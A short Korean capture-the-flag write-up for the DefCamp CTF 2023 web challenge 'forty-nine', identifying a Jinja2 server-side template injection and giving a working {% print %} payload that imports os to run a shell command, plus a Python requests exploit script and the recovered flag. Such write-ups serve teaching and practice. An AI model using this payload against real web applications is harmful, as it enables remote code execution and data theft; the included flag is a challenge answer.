DefCamp CTF 2023 Quals-[Web] forty-nine

프로그램 분석

문제에서 주어진 소스코드 파일은 없는 상태였으며, 웹 인스턴트를 생성하여 접근할 수 있는 문제였습니다.

취약점 분석

문제에서 주어진 7*7 등을 통해 SSTI 관련 문제임을 추측해볼 수 있습니다.

공격 시나리오

{{ }} 가 아닌 {% %}을 통한 SSTI 시도가 가능하다.

{% print(self.__init__.__globals__.__builtins__.__import__('os').popen('cat%20flag.txt').read()) %}

공격 코드

import requests

URL = 'http://34.159.182.195:31729/'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = "input={% print(self.__init__.__globals__.__builtins__.__import__('os').popen('cat%20flag.txt').read()) %}"

res = requests.post(URL, headers=headers, data=data)

flag = res.text
flag = flag.split("CTF{")[1]
flag = flag.split("}")[0]
flag = "CTF{"+flag+"}"
print(flag)
# CTF{f1cb7344129bcc51480407f1f381cb994c155194fdde34b827cc48c9f4d3040e}